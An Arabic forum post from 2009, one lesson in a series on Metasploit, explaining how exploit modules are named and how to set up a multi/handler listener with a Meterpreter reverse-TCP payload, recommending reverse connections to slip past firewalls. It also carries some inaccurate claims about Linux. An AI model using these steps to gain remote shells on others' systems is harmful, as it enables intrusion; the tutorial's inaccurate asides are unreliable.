الموضوع: [الدرس الخامس] الاكسبلويت واستخداماتها وانواعها
عرض مشاركة واحدة
قديم 09-22-2009, 11:25 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 
 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road
افتراضي [الدرس الخامس] الاكسبلويت واستخداماتها وانواعها

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

اول شيء :كل عام وانتم الى الله اقرب
ثاني شيء
كيف احوالكم وصحتكم وان شاء الله تكونو بخير وتصوموا ستة شوال مو مثلي :D
ثالث شيء اليوم درسنا عن الاسكبلويت exploits وما هي انواعها ووظيفتها
ووظيفتها يكمن في اسمها ونوعها

يعني درس بسيط ومفهوم بأذن الله

لأستعراض الـ exploit نضع الامر

كود PHP:
show exploits 
الآن رح يظهر امامنا الثغرات

ملاحظة للثغرات والبايلود واقسامها
تكون كذا

windows/browser/yahoomessenger_fvcom

windows/ browser/ yahoomessenger_fvcom
اسم الثغرة | النوع او البرنامج المصاب | نوع النظام المصاب بالثغرة

هذه بأختصار
الآ نجي نشملها شوي
windows : كما ذكرت سابقا وهي ترمز لنوع النظام المصاب ولا يقتصر فقط على وندز وانما يشمل الجميع منل لينوكس ويونكس .. وقليل جدا ما تلاقي لينوكس ويونكس لقلة الثغرات الموجودة به لانه يستعمل امتداد tar.giz اذافة الى انها لا تحتاج اي كراك ولا غيرها ولا برامج تنفيذية .ز يعني لا يشغلها
browser : نوع البرنامج المصاب وهنا في هذه الحالة المتصفح Internet Explorer وانتم تعرفونه وتعرفون ثغرات .. بس بالميتاسبلويت جاهزة وكمان ثغرات ذات امتداد صورة :D افرح يا ولد :057:

yahoomessenger_fvcom : اسم الثغرة في مجلد الميتاسبلويت ويلزم ان يكون اسم الثغرة حسب ما هو مطلوب ضمن اكواد الثغرة

هيك هي تقسم الثغرة الى ثلاث اقسام وهي نوع النظام ونوع البرنامج المصاب واسم الثغرة

الآن لتعرف ماذا تعمل هذه الثغرة او ما البرنامج المصاب واصداره .. يكون موجود في الجانب الايمن شرح موجز بسيط عنه او بأمكانك وضع كلمة Info متبوعة بألثغرة يعني في مثالنا الاعلى يعني يكون الامر كذا
info windows/browser/yahoomessenger_fvcom

الآن يوجد ثغرات شاذة
مثل :...!!

كود PHP:
test/aggressivetest 
كود PHP:
test/exploitme 
كود PHP:
test/kernel 
فهي واضحة
تعمل اختيار سواء لسيرفر او نواة كيرنل

ويوجد هذه ايضا

كود PHP:
multi/handler 
الاغلب يظن ثغرة وهذه يا اخوان هي شبيه جدا بالنت كات .. تعمل تصنت .. لكن فقط تستعمل للميتاسبلويت لانه في اعداداتها يلزمك تضع البايلود والاي بي والبورت ... ما يهمنا الاي بي والبورت لكن اذ لم تضع البايلود فلت يتم الاستغلال يعني لا تستخدم في تصنت على سيرفرات وسيف مود .. ألخ

وهنا سأشرح استخدامها
اول شيء تستخدم امر استخدام الثغرو
كود PHP:
use multi/handler 
ثاني شيء امر ادخال اي بي جهازك للتصنت
كود PHP:
set LHOST 192.168.4.101 
ثالث امر ادخال البورت الذي وضعته في خيارات الثغرة او البايلود <<< رح تفهمها قريباا
كود PHP:
set LPORT 9999 
وبأمكانك وضع اي بورت استخدمته انت في اختيارتك للثغرة

رابع امر وهو اختيار البايلود التي وضعتها في استغلالك لثغرة ما او وضعتها عند انشائك لبايلود .. فتضعها هناا

كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp 
ويفضل للجميع اختيار الاتصال العكسي لتخطي الجدار الناري اذا لم يكن مفتوح بورت .. وهذا بعد التأكد من ان البورت مفتوح

####
اعرف طولتها عليكم
والاغلب مافهم منيح
لكن بعد الدروس القادمة رح تكونون فاهمين كل شيء ... !

$##$#$#$#$#$$$#$#$
تحياتي
لا للاحتكار
المجهوول

Fhg]vs hgohlsD hgh;sfg,dj ,hsjo]hlhjih ,hk,huih

التعديل الأخير تم بواسطة المجهووول ; 11-13-2009 الساعة 04:39 PM.

   

رد مع اقتباس